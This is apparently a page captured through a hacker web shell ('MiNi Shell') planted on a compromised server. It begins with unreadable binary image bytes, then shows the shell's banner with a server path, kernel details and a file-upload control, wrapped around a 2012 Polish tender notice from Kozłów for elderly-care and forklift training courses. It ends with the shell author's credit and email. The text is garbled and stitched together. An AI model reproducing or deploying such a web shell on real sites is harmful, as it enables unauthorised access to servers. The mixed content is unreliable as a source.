JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20120718/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20120718/257882-N-2012.html

<p class="kh_header"><b>Kozłów: Usługi szkoleniowe dla beneficjentów ostatecznych projektu systemowego pn.: Aktywność Naszą Szansą</b><br>
<b>Numer ogłoszenia: 257882 - 2012; data zamieszczenia: 18.07.2012</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gminny Ośrodek Pomocy Społecznej , Kozłów 60, 32-241 Kozłów, woj. małopolskie, tel. 41 3841033, faks 41 3841033.</p>
<ul class="kh_indent_1">
</ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Usługi szkoleniowe dla beneficjentów ostatecznych projektu systemowego pn.: Aktywność Naszą Szansą.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia są Usługi szkoleniowe dla beneficjentów ostatecznych projektu systemowego pn.: Aktywność Naszą Szansą

Zamówienie obejmuje:

Część 1: Kurs - Opiekun osób starszych 

Przedmiotem zamówienia jest przeprowadzenie kursu o nazwie Kurs - Opiekun osób starszych dla 2 osób - uczestników  Projektu Aktywność Naszą Szansą. Celem kursu jest nabycie przez uczestników umiejętności i wiedzy niezbędnych do wykonywania pracy na stanowisku - Opiekun osób starszych.
Program powinien obejmować 40 godzin dydaktycznych, w tym zajęcia praktyczne - łącznie z egzaminem (pod godziną dydaktyczną należy rozumieć 45 minut). Zamawiający wymaga aby zajęcia odbywały się w dni robocze, tj. od poniedziałku do piątku.
W wyniku kursu uczestnik powinien co najmniej zapoznać się z następującą tematyką: umiejętności rozpoznawania potrzeb psychofizycznych osoby starszej oraz określania ich regulacyjnej funkcji. Anatomia i fizjologia wieku podeszłego, choroby wieku podeszłego ( demencja, Alzehimer, Parkinson, cukrzyca, udar), opieka nad osobami na nie cierpiącymi. Pomoc w codziennych czynnościach, np. pielęgnacyjnych, w dbaniu o zdrowie, higienę osobistą, szczególnie u podopiecznych chorych i niesamodzielnych, profilaktyka odleżyn oraz skutków długotrwałego unieruchomienia. Ponadto uczestnik kursu powinien nabyć umiejętności przeprowadzenia najprostszych ćwiczeń rehabilitacyjnych, udzielić pierwszej pomocy w przypadkach zagrożenia zdrowia i życia podopiecznego, obsługi wózków inwalidzkich. Zasady żywienia ludzi starszych, wybrane zagadnienia z farmakoterapii. Uzyska podstawowe kwalifikacje do aktywizowania podopiecznego do zwiększania jego samodzielności życiowej, doradzania w zakresie planowania i organizacji gospodarstwa domowego, kontaktowania się z różnego rodzaju instytucjami w celu rozwiązywania problemów zdrowotnych, materialnych, mieszkaniowych, rodzinnych i prawnych podopiecznego oraz przeciwdziałania wykluczeniu społecznemu podopiecznego. Potrafi mobilizować podopiecznego do aktywnego spędzania czasu wolnego i rozwijania zainteresowań oraz inicjować działania na rzecz budowania pozytywnych relacji międzyludzkich w najbliższym otoczeniu podopiecznego, m.in. z członkami jego rodziny. 
Organizacja praktyki należy do Wykonawcy.
Zamawiający wymaga aby Wykonawca zapewnił:
- ubezpieczenie uczestników kursu od następstw nieszczęśliwych wypadków na czas trwania
szkolenia oraz drogi tam i powrotnej ze szkolenia wg imiennej listy uczestników dostarczonej przez Zamawiającego,
- catering (obiad - drugie danie mięsne (w piątek ryba) + ziemniaki/ryż/frytki +surówka i napój), kawa, herbata, woda, soki, ciastka - minimum 3 rodzaje, mleczko/śmietanka do kawy, cukier). Zestawy obiadowe powinny być zróżnicowane podczas poszczególnych dni kursu,
- salę wykładową z dostępem do zaplecza sanitarnego i socjalnego, przystosowaną do prowadzenia zajęć dla minimum 2 osób, wyposażoną w stoliki, krzesła, urządzenia projekcyjne,
- oznakowanie pomieszczeń, w których będą odbywały się zajęcia logotypami zgodnymi z Wytycznymi dotyczącymi oznaczania projektów w ramach Programu Operacyjnego Kapitał Ludzki wraz z umieszczeniem informacji o współfinansowaniu ze środków Europejskiego Funduszu Społecznego,
- odpowiednie warunki pracy, niezbędne materiały i sprzęt, spełniające wymagania bezpieczeństwa i higieny pracy, w ilości i stanie technicznym gwarantującym odpowiedni - swobodny dostęp uczestnikom szkolenia do stanowisk, przy których będzie odbywała się praktyka,
- w przypadku przeprowadzania praktyk poza Kozłowem koszt dojazdu uczestników kursu z Kozłowa na miejsce przeprowadzenia praktyk ponosi wykonawca (odległość nie większa niż 30 km),
- badania lekarskie i/lub specjalistyczne,
- materiały szkoleniowe i dydaktyczne (zeszyty ew. notatniki, długopisy, teczki papierowe, skrypty opracowane przez wykładowców), od pierwszego dnia kursu. W/w materiały Wykonawca przekaże uczestnikom kursu. Materiały szkoleniowe po zakończeniu kursu przejdą na własność uczestnika kursu. Jeden komplet materiałów szkoleniowych Wykonawca
przekaże Zamawiającemu po zakończeniu realizacji zamówienia. Obowiązkiem Wykonawcy
jest oznaczenie ww. materiałów oraz miejsca szkolenia logotypami zgodnymi z Wytycznymi
dotyczącymi oznaczania projektów w ramach Programu Operacyjnego Kapitał Ludzki.
Wykonawca ma obowiązek prowadzenia:
- dziennika zajęć edukacyjnych zawierających listę obecności, wymiar godzin zajęć
edukacyjnych, tematy zajęć edukacyjnych
- rejestru wydanych zaświadczeń
- listy obecności i odbioru cateringu
- listy potwierdzającej odbiór materiałów szkoleniowych i dydaktycznych
- listy potwierdzającej odbiór zaświadczeń
- listy ubezpieczonych osób
- ankiet ewaluacyjnych przed rozpoczęciem kursu i po jego zakończeniu
- protokołu z egzaminu.
Kurs powinien zakończyć się egzaminem wewnętrznym umożliwiającym sprawdzenie wiadomości i umiejętności z poszczególnej tematyki przewidzianej w programie nauczania. Wykonawca ma obowiązek wydania zaświadczenia o jego ukończeniu dla kursanta, który pozytywnie zdał egzamin sprawdzający zdobytą wiedzę oraz uczęszczał w przynajmniej 80%
godzin dydaktycznych w ramach całego kursu. Zaświadczenie powinno być zgodne wzorem załączonym w Rozporządzeniu Ministra Edukacji i Nauki z dnia 3 lutego 2006 r. w sprawie uzyskiwania i uzupełniania przez osoby dorosłe wiedzy ogólnej i, umiejętności i kwalifikacji zawodowych w formach pozaszkolnych (dz. U. z 2006 r. nr 31, poz. 216). Zaświadczenie powinno być opatrzone: flagą UE z odwołaniem do Unii Europejskiej i Europejskiego Funduszu Społecznego i logiem Kapitał Ludzki, wraz z informacją o współfinansowaniu projektu ze środków Unii Europejskiej w ramach Europejskiego Funduszu Społecznego oraz nazwą projektu.
Rozpoczęcie kursu: sierpień 2012 r.
Termin zakończenia kursu: nie później niż do 31.08.2012 r.
Miejsce realizacji kursu: Kozłów
Dokładny termin rozpoczęcia kursu Zamawiający ustali z Wykonawcą zamówienia.
Nie później niż dzień przed faktycznym rozpoczęciem kursu Wykonawca będzie zobligowany przekazać do Zamawiającego planowany harmonogram spotkań zawierający daty i godziny prowadzonych zajęć wraz z tematami rozpisanymi zgodnie z tematyką kursu, przewidzianą ilość godzin zajęć teoretycznych i praktycznych.

Część 2 : Kurs - Operator wózka widłowego
Przedmiotem zamówienia jest przeprowadzenie kursu o nazwie Kurs - Operator wózka
widłowego dla 5 osób - uczestników Projektu Aktywność Naszą Szansą .
Program powinien obejmować 67 godzin dydaktycznych, w tym  44 godziny zajęć teoretycznych, 15godz zajęć praktycznych i 8 godzin obsługi technicznej łącznie z egzaminem. (pod godziną dydaktyczną należy rozumieć 45 minut).
Zamawiający wymaga aby zajęcia odbywały się w dni robocze, tj. od poniedziałku do piątku
W wyniku kursu uczestnik powinien co najmniej zapoznać się z następującą tematyką: zasady bhp i ppoż., rodzaje i typy stosowanych wózków, budowa i wyposażenie wózków widłowych, czynności operatora przy obsłudze wózków, czynności operatora, przed podjęciem pracy, w czasie pracy i po pracy wózkami, wiadomości z zakresu ustawiania i rozmieszczania ładunków, obsługa wózka spalinowego, obsługa wózka akumulatorowego, praktyczna nauka jazdy i manewrowanie osprzętem wózków, umiejętność bezpiecznej wymiany butli gazowych (LPG), wiadomości ogólne techniczne związane z budową i eksploatacją urządzeń technicznych, wskazówki eksploatacyjne, udzielenie pierwszej pomocy przedlekarskiej.
Organizacja praktyki należy do Wykonawcy, przy czym należy z Zamawiającym uzgodnić wymiar godzin teoretycznych i praktycznych oraz miejsce odbywania praktycznej nauki zawodu..
Zamawiający wymaga aby Wykonawca zapewnił:
- ubezpieczenie uczestników kursu od następstw nieszczęśliwych wypadków na czas trwania
szkolenia oraz drogi tam i powrotnej ze szkolenia wg imiennej listy uczestników dostarczonej przez Zamawiającego,
- catering (obiad - drugie danie mięsne (w piątek ryba) + ziemniaki/ryż/frytki +surówka i napój), kawa, herbata, woda, soki, ciastka - minimum 3 rodzaje, mleczko/śmietanka do kawy, cukier). Zestawy obiadowe powinny być zróżnicowane podczas poszczególnych dni kursu,
- salę wykładową z dostępem do zaplecza sanitarnego i socjalnego, przystosowaną do prowadzenia zajęć dla minimum 5 osób, wyposażoną w stoliki, krzesła, urządzenia projekcyjne,
- oznakowanie pomieszczeń, w których będą odbywały się zajęcia logotypami zgodnymi z Wytycznymi dotyczącymi oznaczania projektów w ramach Programu Operacyjnego Kapitał Ludzki wraz z umieszczeniem informacji o współfinansowaniu ze środków Europejskiego Funduszu Społecznego,
- odpowiednie warunki pracy, niezbędne materiały i sprzęt, spełniające wymagania bezpieczeństwa i higieny pracy, w ilości i stanie technicznym gwarantującym odpowiedni - swobodny dostęp uczestnikom szkolenia do stanowisk, przy których będzie odbywała się praktyka,
- w przypadku przeprowadzania praktyk poza Kozłowem koszt dojazdu uczestników kursu z Kozłowa na miejsce przeprowadzenia praktyk ponosi wykonawca, 
- badania lekarskie i/lub specjalistyczne,
- materiały szkoleniowe i dydaktyczne (zeszyty ew. notatniki, długopisy, teczki papierowe,
skrypty opracowane przez wykładowców), od pierwszego dnia kursu. W/w materiały
Wykonawca przekaże uczestnikom kursu. Materiały szkoleniowe po zakończeniu kursu
przejdą na własność uczestnika kursu. Jeden komplet materiałów szkoleniowych Wykonawca
przekaże Zamawiającemu po zakończeniu realizacji zamówienia. Obowiązkiem Wykonawcy
jest oznaczenie ww. materiałów oraz miejsca szkolenia logotypami zgodnymi z Wytycznymi
dotyczącymi oznaczania projektów w ramach Programu Operacyjnego Kapitał Ludzki
Wykonawca ma obowiązek prowadzenia:
- dziennika zajęć edukacyjnych zawierających listę obecności, wymiar godzin zajęć
edukacyjnych, tematy zajęć edukacyjnych
- rejestru wydanych zaświadczeń
- listy obecności i odbioru cateringu
- listy potwierdzającej odbiór materiałów szkoleniowych i dydaktycznych
- listy potwierdzającej odbiór zaświadczeń
- listy ubezpieczonych osób
- ankiet ewaluacyjnych przed rozpoczęciem kursu i po jego zakończeniu
- protokołu z egzaminu.
Kurs powinien zakończyć się egzaminem wewnętrznym umożliwiającym sprawdzenie wiadomości i umiejętności z poszczególnej tematyki przewidzianej w programie nauczania. Wykonawca ma obowiązek wydania zaświadczenia o jego ukończeniu dla kursanta, który pozytywnie zdał egzamin sprawdzający zdobytą wiedzę oraz uczęszczał w przynajmniej 80%
godzin dydaktycznych w ramach całego kursu. Zaświadczenie powinno być zgodne wzorem załączonym w Rozporządzeniu Ministra Edukacji i Nauki z dnia 3 lutego 2006 r. w sprawie uzyskiwania i uzupełniania przez osoby dorosłe wiedzy ogólnej i, umiejętności i kwalifikacji zawodowych w formach pozaszkolnych (dz. U. z 2006 r. nr 31, poz. 216). Zaświadczenie powinno być opatrzone: flagą UE z odwołaniem do Unii Europejskiej i Europejskiego Funduszu Społecznego i logiem Kapitał Ludzki, wraz z informacją o współfinansowaniu projektu ze środków Unii Europejskiej w ramach Europejskiego Funduszu Społecznego oraz nazwą projektu.
Rozpoczęcie kursu: sierpień 2012 r.
Termin zakończenia kursu: nie później niż do 31.08.2012 r.
Miejsce realizacji kursu: Kozłów
Dokładny termin rozpoczęcia kursu Zamawiający ustali z Wykonawcą zamówienia.
Nie później niż dzień przed faktycznym rozpoczęciem kursu Wykonawca będzie zobligowany przekazać do Zamawiającego planowany harmonogram spotkań zawierający daty i godziny prowadzonych zajęć wraz z tematami rozpisanymi zgodnie z tematyką kursu, przewidzianą ilość godzin zajęć teoretycznych i praktycznych..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 80.50.00.00-9, 80.51.00.00-2.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 2.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 31.08.2012.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający nie wymaga wniesienia wadium.</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca musi wykazać, że w okresie ostatnich trzech (3) lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, zrealizował:
dla Części 1: przynajmniej 2 kursy - opiekun osób starszych lub inne podobne o zbliżonej tematyce i zakresie do kursu objętego tą częścią zamówienia;
dla Części 2: przynajmniej 2 kursy - operator wózka widłowego lub inne podobne o zbliżonej tematyce i zakresie do kursu objętego tą częścią zamówienia.
Wykonawca winien wykazać, że kursy te zostały wykonane lub są wykonywane należycie.
Wykonawca może polegać na wiedzy i doświadczeniu innych podmiotów. W takim przypadku winien udowodnić Zamawiającemu, że będzie dysponować tymi zasobami, tj. przedstawi pisemne zobowiązanie tych podmiotów do oddania mu do dyspozycji niezbędnych zasobów na okres korzystania z nich przy wykonywaniu zamówienia.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, dostaw lub usług  w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentu potwierdzającego, że te dostawy lub usługi zostały wykonane lub są wykonywane należycie</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

</ul></li>
<li>
</li>
</ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1.Oświadczenie Wykonawcy o spełnianiu warunków udziału w postępowaniu określonych w art. 22 ustawy Prawo zamówień publicznych. 
2. W sytuacji, gdy Wykonawca polega na wiedzy i doświadczeniu innych podmiotów, niezależnie od charakteru prawnego łączących go z nimi stosunków należy dołączyć do oferty pisemne zobowiązanie tych podmiotów do oddania mu do dyspozycji niezbędnych zasobów na okres korzystania z nich przy wykonaniu zamówienia,
3.Pełnomocnictwo.
4. Formularz oferty.</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>1.Zamawiający przewiduje możliwość zmian postanowień zawartej umowy w stosunku do treści oferty, na podstawie, której dokonano wyboru wykonawcy, w przypadku wystąpienia, co najmniej jednej z okoliczności wymienionych poniżej: 
1.1. Zmiana terminu realizacji przedmiotu umowy (w przypadku zaistnienia okoliczności niezależnych od Zamawiającego i Wykonawcy.
Przedłużenie terminu nastąpi o czas niezbędny do ustania okoliczności, stanowiących podstawę do jego przedłużenia.
1.2. Zmiany osobowe:
a)  zmiana podwykonawcy, przy pomocy którego Wykonawca wykonuje przedmiot umowy (w przypadku zaistnienia okoliczności uzasadniających taką zmianę).
1.3. Pozostałe zmiany:
a) zmiana miejsca realizacji zajęć, gdy konieczność ta wynika z przyczyn losowych,
b) zmiana harmonogramu zajęć w uzasadnionych przypadkach i za zgoda zamawiającego</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.bip.kozlow.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Gminny Ośrodek Pomocy Społecznej,
Kozłów 60,
32-241 Kozłów.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 26.07.2012 godzina 09:00, miejsce: Gminny Ośrodek Pomocy Społecznej,
Kozłów 60,
 32-241 Kozłów.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Projekt  jest współfinansowany ze środków Unii Europejskiej w ramach Programu Operacyjnego Kapitał Ludzki, Priorytet VII Promocja Integracji Społecznej, Działanie 7.1. Rozwój i upowszechnianie aktywnej integracji, Poddziałanie 7.1.1 Rozwój i upowszechnianie aktywnej integracji przez ośrodki pomocy społecznej..</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com